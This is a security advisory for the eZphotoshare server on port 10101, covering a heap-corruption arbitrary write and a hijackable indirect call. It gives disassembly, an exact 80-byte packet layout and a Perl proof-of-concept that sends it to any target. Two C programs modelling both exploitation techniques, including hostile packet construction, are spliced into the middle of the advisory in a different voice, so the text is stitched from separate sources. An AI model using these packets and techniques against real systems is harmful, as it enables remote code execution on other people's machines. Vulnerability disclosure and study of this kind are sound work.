eZphotoshare Multiple Overflow Vulnerabilities
##############################################

Credit:
  Author     : Peter Winter-Smith

Software:
  Package    : eZphotoshare
  Versions   : All up to and including the latest version
  Vendor     : eZnetwork
  Vendor Url : http://www.ezphotoshare.com/

Vulnerability:
  Bug Type   : Multiple *Interesting* Overflows
  Severity   : Moderately/Highly Critical
               + Code Execution with Application Privileges
               + Arbitrary Memory can be Overwritten

1. Description of Software

"eZphotoshare is an amazing new way to share Digital Photos over the Internet with friends and family. Seeing is believing, download it today and interactively share digital photos anytime, anywhere. It's FREE for home use."
 - Vendor's Description

2. Bug Information

(a). Heap Corruption Vulnerability

By sending a packet of exactly 80 bytes to eZphotoshare on port 10101 eight times in a row, it is possible to corrupt a heap block header so that two attacker-supplied dwords are later loaded into the eax and ecx registers from the esi pointer inside the allocator. The vulnerable code lies in the RtlAllocateHeap function in the module 'ntdll.dll' and is shown below:

:77F580C9 mov eax, dword ptr [esi+08]         ; eax contains our arbitrary dword of data
:77F580CC mov dword ptr [ebp+FFFFFF64], eax
:77F580D2 mov ecx, dword ptr [esi+0C]         ; ecx contains the next arbitrary dword of
                                               ; data which we supply
:77F580D5 mov dword ptr [ebp+FFFFFF60], ecx
:77F580DB mov dword ptr [ecx], eax            ; write the contents of the eax register to
                                               ; the address referenced by the ecx register!

The two dwords at [esi+08] and [esi+0C] are the forward and back links of a free-list entry, so the store at 77F580DB is the allocator unlinking a block whose links we have overwritten: a write of an arbitrary dword ($eax) to an arbitrary address ($ecx).

The packet structure should be as follows:

  $packet = "GET /aaa" . $eax . $ecx . "a"x64;

where $eax and $ecx are each exactly four bytes in length (8 + 4 + 4 + 64 = 80 bytes in total).

An arbitrary dword write of this kind could, amongst other things, allow a remote attacker to overwrite a saved return address or another code pointer on the target system, and thus open the possibility of remote code execution with the privileges of the user running the application.

(b). Overwriting of Important Saved Values

By sending an overly long packet of data to eZphotoshare on port 10101 it is possible to overwrite some important saved values in memory, and these can be crafted to give complete control over the instruction pointer. The vulnerable code lies in 'mfc42.dll' and is shown below:

:73DD1C3D mov edi, dword ptr [ebp+08]         ; [ebp+08] points to a pointer to our user
                                               ; supplied data
...
:73DD1C62 push [ebp+18]
:73DD1C65 mov eax, dword ptr [edi]            ; the value pointed at by the edi register
                                               ; comes directly from our user supplied data,
                                               ; therefore the eax register now contains
                                               ; anything we wish it to (even nulls!)
...
:73DD1C6D FF90A0000000 call dword ptr [eax+000000A0]
                                               ; whammo! execution flow is directed to the
                                               ; address stored at eax plus a0h. To gain
                                               ; control of the instruction pointer we just
                                               ; need eax to point at an address containing
                                               ; the value we want in eip (remembering to
                                               ; subtract a0h from that address), and we have
                                               ; full control of the eip register!

Exploitation Notes:

I have been able to execute code through the flaws found in eZphotoshare, despite the apparent complications which arise when it comes to exploitation, and therefore I would urge you to take measures to protect your systems if you use this software, whatever those measures may be.

3. Proof of Concept Code

I have decided not to release my remote code execution exploits for the mentioned flaws until the vendor has had a fair amount of time to patch their software. Instead I am going to release proof of concept code which demonstrates the heap corruption vulnerability. I am not going to release code for the Important Value Overwrite vulnerability, since it is pretty straightforward to reproduce and is best demonstrated with netcat or the like.

For best results, attach the windbg utility to eZphotoshare before using this proof of concept code, so that you can see the attack and its results in real time.
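The write-what-where in (a) is easier to reason about with a model of what the allocator is doing when it executes `mov [ecx], eax`. The following C program is an added example for this page, not the author's exploit and not code from ntdll: it lays out a free-list entry with the forward/back links behind an 8-byte chunk header (so they sit at +8/+0C on a 32-bit build, matching [esi+08] and [esi+0C]), performs the unchecked unlink, and then shows the "safe unlinking" check (flink->blink == entry and blink->flink == entry) that later Windows heap versions added and which rejects the corrupted entry. The struct names, the arena with a `target_slot` and a `payload` buffer, and the `build_corrupted_chunk` helper are all assumptions made for the illustration. Note that a doubly linked unlink also performs a second, mirror store (the advisory's excerpt stops before it), which is why the "what" value must itself be a writable address and why a few bytes of the attacker's buffer are clobbered:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of a free-list link pair. On 32-bit Windows the forward link is
 * loaded into eax and the back link into ecx in the quoted RtlAllocateHeap
 * code. Names and layout are this example's own, not copied from ntdll. */
typedef struct list_entry {
    struct list_entry *flink;   /* offset 0 of the pair  -> eax */
    struct list_entry *blink;   /* offset 4 (32-bit)     -> ecx */
} list_entry_t;

/* Free chunk: 8-byte chunk header, then the links, so the links sit at
 * +8 / +0C on a 32-bit build exactly like [esi+08] / [esi+0C]. */
typedef struct free_chunk {
    uint8_t      header[8];
    list_entry_t link;
} free_chunk_t;

/* Unchecked unlink, as in the vulnerable allocator. */
static void remove_entry_unchecked(list_entry_t *e)
{
    list_entry_t *f = e->flink;   /* eax */
    list_entry_t *b = e->blink;   /* ecx */
    b->flink = f;                 /* mov [ecx], eax : "what" (f) written to "where" (b) */
    f->blink = b;                 /* mirror store: b lands at f + sizeof(void *) */
}

/* Safe unlinking: refuse to unlink an entry whose neighbours do not point back. */
static int remove_entry_safe(list_entry_t *e)
{
    if (e->flink->blink != e || e->blink->flink != e)
        return 0;                 /* links disagree: header corruption detected */
    remove_entry_unchecked(e);
    return 1;
}

/* Constructed arena for the demonstration (assumption, not a real heap). */
typedef struct {
    void        *target_slot;     /* stands in for a saved pointer we want to own */
    uint8_t      payload[64];     /* attacker-controlled, writable bytes ("what") */
    free_chunk_t victim;          /* the free chunk whose header the overflow reaches */
} arena_t;

static void build_corrupted_chunk(arena_t *a)
{
    memset(a, 0, sizeof *a);
    memset(a->payload, 0x90, sizeof a->payload);            /* filler, constructed */
    /* The eight 80-byte packets of the PoC leave $eax and $ecx here: */
    a->victim.link.flink = (list_entry_t *)a->payload;      /* $eax: value to write  */
    a->victim.link.blink = (list_entry_t *)&a->target_slot; /* $ecx: address to hit  */
}

/* Returns 1 when the unchecked unlink redirected target_slot to the payload
 * and the mirror store deposited &target_slot inside the payload. */
int demo_unchecked_write(void)
{
    arena_t a;
    build_corrupted_chunk(&a);
    remove_entry_unchecked(&a.victim.link);
    if (a.target_slot != (void *)a.payload)
        return 0;
    void *mirror;
    memcpy(&mirror, a.payload + sizeof(void *), sizeof mirror);
    return mirror == (void *)&a.target_slot;
}

/* Returns 1 when safe unlinking rejects the corrupted chunk and leaves
 * target_slot untouched. */
int demo_safe_unlink_rejects(void)
{
    arena_t a;
    build_corrupted_chunk(&a);
    int unlinked = remove_entry_safe(&a.victim.link);
    return unlinked == 0 && a.target_slot == NULL;
}

int main(void)
{
    printf("unchecked unlink overwrote target: %d\n", demo_unchecked_write());
    printf("safe unlink rejected corrupt chunk: %d\n", demo_safe_unlink_rejects());
    return 0;
}
```

Build with any C99 compiler (`cc -Wall heap_unlink.c`). The point of the second function is the check a practitioner should expect a hardened allocator to perform: the corrupted entry's forward link points into attacker bytes, so `e->flink->blink` cannot equal `e`, and the unlink is refused before any store happens.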
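The indirect call in (b) is a vtable-style dispatch through a pointer that the attacker supplies, and the only arithmetic the attacker has to get right is the a0h displacement. This C program is an added example for this page (not the author's exploit, and not mfc42 code) that models the pattern: the first machine word of user data is taken as an object pointer (`mov eax, [edi]`) and the function pointer at +0xA0 is called (`call [eax+000000A0]`). The hostile packet plants its own function pointer right behind the fake object pointer and sets the fake pointer to that location minus 0xA0, so the dispatch lands on the planted value. Beside it is the hardened form, where user data may only select, by bounds-checked index, among objects the program created itself. `object_t`, the handler names and the packet layout are assumptions for the illustration:

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SLOT_OFFSET 0xA0u        /* the A0h displacement in the quoted call */

typedef int (*handler_fn)(void);

static int legitimate_handler(void) { return 1; }
static int planted_handler(void)    { return 0x41414141; } /* stands in for attacker code */

/* What the library believes it is calling through: an object with a
 * function pointer at +0xA0. Layout is an assumption for this example. */
typedef struct {
    uint8_t    pad[SLOT_OFFSET];
    handler_fn handler;
} object_t;

/* Vulnerable pattern: the object pointer itself comes from user data. */
static int dispatch_unchecked(const uint8_t *user_data)
{
    uintptr_t eax;
    memcpy(&eax, user_data, sizeof eax);                     /* mov eax, [edi]      */
    handler_fn fn;
    memcpy(&fn, (const void *)(eax + SLOT_OFFSET), sizeof fn); /* call [eax+A0h]    */
    return fn();
}

/* Hardened pattern: user data only selects one of our own objects. */
static int dispatch_checked(const uint8_t *user_data,
                            object_t *const *objects, size_t count)
{
    uint32_t idx;
    memcpy(&idx, user_data, sizeof idx);
    if (idx >= count)
        return -1;                                           /* reject out-of-range */
    return objects[idx]->handler();
}

/* Hostile packet (constructed): word 0 is the fake object pointer, chosen as
 * (address of the planted function pointer) - 0xA0; the planted pointer
 * follows immediately inside the same packet. */
static void build_hostile_packet(uint8_t *packet, size_t len)
{
    memset(packet, 'a', len);
    uintptr_t planted_at = (uintptr_t)(packet + sizeof(uintptr_t));
    uintptr_t fake_obj   = planted_at - SLOT_OFFSET;         /* subtract a0h */
    handler_fn fn = planted_handler;
    memcpy(packet, &fake_obj, sizeof fake_obj);
    memcpy(packet + sizeof(uintptr_t), &fn, sizeof fn);
}

/* Returns 0x41414141: control reached the planted pointer. */
int demo_unchecked_hijack(void)
{
    uint8_t packet[64];
    build_hostile_packet(packet, sizeof packet);
    return dispatch_unchecked(packet);
}

/* Returns 1 for index 0 (the one legitimate object), -1 for anything else. */
int demo_checked_dispatch(uint32_t requested_index)
{
    object_t obj = { {0}, legitimate_handler };
    object_t *objects[] = { &obj };
    uint8_t packet[64];
    memset(packet, 'a', sizeof packet);
    memcpy(packet, &requested_index, sizeof requested_index);
    return dispatch_checked(packet, objects, 1);
}

int main(void)
{
    printf("unchecked dispatch returned 0x%x\n", demo_unchecked_hijack());
    printf("checked dispatch, index 0: %d\n", demo_checked_dispatch(0));
    printf("checked dispatch, index 0xffffffff: %d\n", demo_checked_dispatch(0xFFFFFFFFu));
    return 0;
}
```

The unchecked version will happily follow a pointer into the attacker's own packet, which is exactly what the advisory's comment about "remembering to subtract a0h" describes; in a real target the planted word would be the address of the attacker's code rather than a local function.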
# ---------------------------------[eZpsheap.pl]--------------------------------
#
#!/usr/bin/perl -w
#
# Heap Corruption Vulnerability in eZphotoshare PoC
#  - by Peter Winter-Smith [peter4020@hotmail.com]
#
# Connects to the target on tcp/10101 eight times and sends the 80-byte
# packet described in section 2(a) on each connection.

use strict;
use warnings;
use IO::Socket;

if (!defined $ARGV[0]) {
    print "Usage: eZpsheap.pl <target>\n\n";
    exit;
}

print "Heap Corruption PoC\n";

for (my $n = 1; $n < 9; $n++) {
    my $victim = IO::Socket::INET->new(Proto    => 'tcp',
                                       PeerAddr => $ARGV[0],
                                       PeerPort => 10101)
        or die "Unable to connect to $ARGV[0] on port 10101\n";

    my $eax = "ABCD";                       # dword that ends up in eax
    my $ecx = "XXXX";                       # dword that ends up in ecx (write address)
    my $packet = "GET /aaa" . $eax . $ecx . "a" x 64;   # 8 + 4 + 4 + 64 = 80 bytes

    print $victim $packet;
    print " + Sending packet number $n of 8 ...\n";
    sleep(1);
    close($victim);
}

print "Done.\n";
exit;
# ------------------------------------------------------------------------------

4. Patches - Workarounds

No known patches have been issued. Secunia often have pretty sufficient workarounds, so I would recommend that you check their 'solutions' on www.secunia.com if you want a professional opinion.

5. Credits

The discovery, analysis and exploitation of this flaw is a result of research carried out by Peter Winter-Smith. I would ask that you do not regard any of the analysis to be 'set in stone', and that if investigating this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick k., Joel J. and Martine.

Huge thanks to everyone who makes this industry as great as it is, and puts up with all my ever so vague and technically questionable contributions ;o)

Brett Moore - Are you *trying* to break Microsoft? ;o) ;o( o

This document should be mirrored at:
 - http://www.elitehaven.net/ezphotoshare.txt